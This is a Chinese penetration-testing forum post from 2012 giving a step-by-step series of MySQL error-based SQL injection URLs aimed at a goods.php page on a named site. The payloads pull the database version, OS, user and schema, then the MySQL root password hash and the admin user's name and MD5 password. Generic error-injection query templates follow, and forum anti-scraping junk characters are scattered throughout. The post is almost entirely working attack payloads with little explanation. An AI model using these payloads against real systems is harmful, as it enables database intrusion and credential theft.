找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2630|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
. |" v/ W& a, _  L' p4 {http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 K4 `0 n9 x, r- v' u
; s6 ~, A, H( u- Y% R$ H判断系统
; X: Z% F$ s& f, D" ~$ [& C. a0 j7 z4 q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 l9 v9 |, A% e
. p4 D; r/ }% F2 A

7 H6 H/ w9 j3 X6 N8 |& b# v1 F, E0 ]/ k! n  D
当前 user()$ m. }8 D; G, k% a

0 _) w* t" p3 y2 s9 q% L& Bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ {; z) q8 ]# v- k# j
' Q% x3 `4 p, E. R

9 x/ y6 z# S5 A% X- g
/ n6 T4 w  V) J当前 database()( B2 z7 }' Y( L5 i6 I. J$ {- y. t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 h" X$ k- D6 a  q$ n5 J# h- O
+ x  K% h! t9 d2 t0 p
( x% F; J4 Z- y8 f% H' l/ E* J- Q+ N% z/ m0 M
, T; m2 ], [1 O; o. D
root hash
& h! ~5 I5 f0 x9 U& t: p7 Q4 b% L
" _, M1 l( o$ K2 \7 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( g  _, ?' S! [& v& G9 K4 c( q0 v" }
( ~& K- g3 h  ^* s8 `

" i3 q$ `# E: c3 [当前 数据库表名
% I& w4 S4 e# Q6 C# y/ X" F8 {
$ ]' j  Y( m4 U8 a- Y/ [) V/ xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 V/ g3 y) J; u  p- ]+ l

6 E' Y% ~7 K4 m. n1 J7 C1 s
2 E1 J; o" Y5 {" o0 C
& t$ m, Z- x0 [9 o% L! J  ?2 T当前 数据库 user_name 字段
) \) c$ u  y* u5 H% L
) d0 B9 @# u' x( n. I+ fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" x9 p0 \9 F& q0 x$ \- y
$ m( B9 K/ E+ {$ d$ P; x6 `当前 数据库 字段 password8 S, V& Y- P+ Y' O+ a7 q
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  L' f: w3 n3 v3 e2 O
! t+ j6 n# {/ y$ I- v, E7 ^- @5 d( f7 A0 v! }
4 ~- f3 ^( ]( ~; I
获得 admin passwd(md5); a8 [; A4 Y. J! W* w
' h7 |7 f  c' \# Q& l% Y3 u

% p4 N# n4 w; X( D, r: Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 T2 l3 w0 F( Z, |( t% ^( V  r/ }, B7 w# S& ]
报错注射# k, L! l- n1 F
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)8 w" `8 N" P; R" }7 \! K
- P; F' r1 ?2 B* F
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)) o. Q# X' N$ o, A$ X

  B7 U% p9 @  ]3 W& yand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表